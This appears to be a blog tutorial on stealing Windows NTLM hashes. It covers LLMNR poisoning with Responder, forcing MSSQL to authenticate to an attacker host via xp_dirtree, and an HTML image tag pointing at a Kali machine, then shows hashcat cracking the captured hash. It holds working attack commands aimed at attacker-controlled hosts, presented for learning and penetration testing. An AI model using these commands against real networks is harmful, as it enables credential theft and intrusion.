What is NTLM and NTLMv2?
NTLM (NT LAN Manager) is an authentication protocol used in Windows networks. When a user logs in to a Windows machine, their password is hashed and stored in the machine’s local security authority (LSA) database. When the user accesses network resources, their NTLM hash is passed along with their requests to authenticate themselves to the resource.
NTLMv2 is a newer and more secure version of NTLM. Although its secure, its still susceptible to different types of attacks. NTLMv2 hashes cannot be used for pass the hash attacks but they can be cracked if they are weak.
What you’ll learn
- LLMNR Poisoning to get NTLM hash
- XSS to get NTLM hash
- Getting NTLM hash from from MSSQL access
Exploit 1 (LLMNR Poisoning)
What is LLMNR Poisoning?
LLMNR is a protocol used by Windows computers to find the IP address of other devices on the same network when a DNS server is not available. It sends out messages to all devices on the network asking if they know the IP address for a specific device name. If one of the devices knows the answer, it sends back a response with the IP address, which the computer can then use to communicate with that device.
During an LLMNR/NBT-NS poisoning attack, an attacker can intercept and manipulate the network traffic. They can do this by sending a malicious response to a legitimate LLMNR query. Once the attacker has intercepted the traffic, they can extract the NTLMv2 credentials from the intercepted packets. The credentials are hashed but can be cracked if they are weak.
Demo of LLMNR Poisoning
Note: This Demo will show the perspectives of both the attacker and victim.
To intercept the traffic and steal credentials, we’re going to use the tool “Responder” on Kali.
First, lets set up a listener on responder. Make sure to change “eth1” to your own interface.
sudo responder -I eth1 -v
Back on the Windows machine, the user misspells a share name in file explorer
To the user, it just looks like this
But on Kali, we get their hash
Exploit 2 (MSSQL access to NTLM Hash)
How does the exploit work?
I recently found out about this method but its super interesting to me just because of how easy it is.
To summarize: When the xp_dirtree stored procedure is executed with a UNC path (//192.168.5.6/file), it sends a network request to the specified remote server to gather information about the file system. In the process of sending this request, the vulnerable SQL Server will try to authenticate to the remote server using the current user’s credentials. The attacker can pretend to be the remote server and take advantage of the network request to get the NTLM hash of the user who sent that request.
Demo of MSSQL Exploit
Scenario: We are able to log into a mssql server with the user “J.Williams” and his password. We logged in through mssqlclient.py
Just like last time, start responder on Kali
After that, we can run this command in the mssqlclient.py interface
mssqlclient.py -p 1433 WANDA/J.Williams:Password1@192.168.5.6EXEC master..xp_dirtree "\\192.168.5.7\test"; --
Back on responder, we get the NTLMv2 hash of the ms-sql user.
Note: The reason we got a hash for the ms-sql user is because thats who the MS-SQL server is running as. If it was running as “user1”, we would have gotten the hash for user1.
Exploit 3 (XSS to NTLM Hash)
How does it work
This attack involves an attacker hosting a webpage that prompts the victim to enter their credentials in a Windows Security prompt. The webpage contains HTML code that references the responder server, which can capture the NTLMv2 hash.
Demo
First, lets setup a webpage using python’s http server. The index.html file should contain this:
<html><img src=http://KALI_IP/><html>
Now start responder the same way we did previously.
The next step is to get the victim to connect to this webpage. Once the victim goes to the site, Windows Security will prompt them to sign in.
If the user enters their credentials, we’ll get their hash back on responder
Cracking the Hash
Lets try cracking the hash we got from example 2. We have to set the mode (-m) to 5600.
hashcat -m 5600 hash.txt /home/activepwn/Documents/rockyou.txt
Thanks for reading! If you enjoyed reading or found the post useful, please consider sharing it.
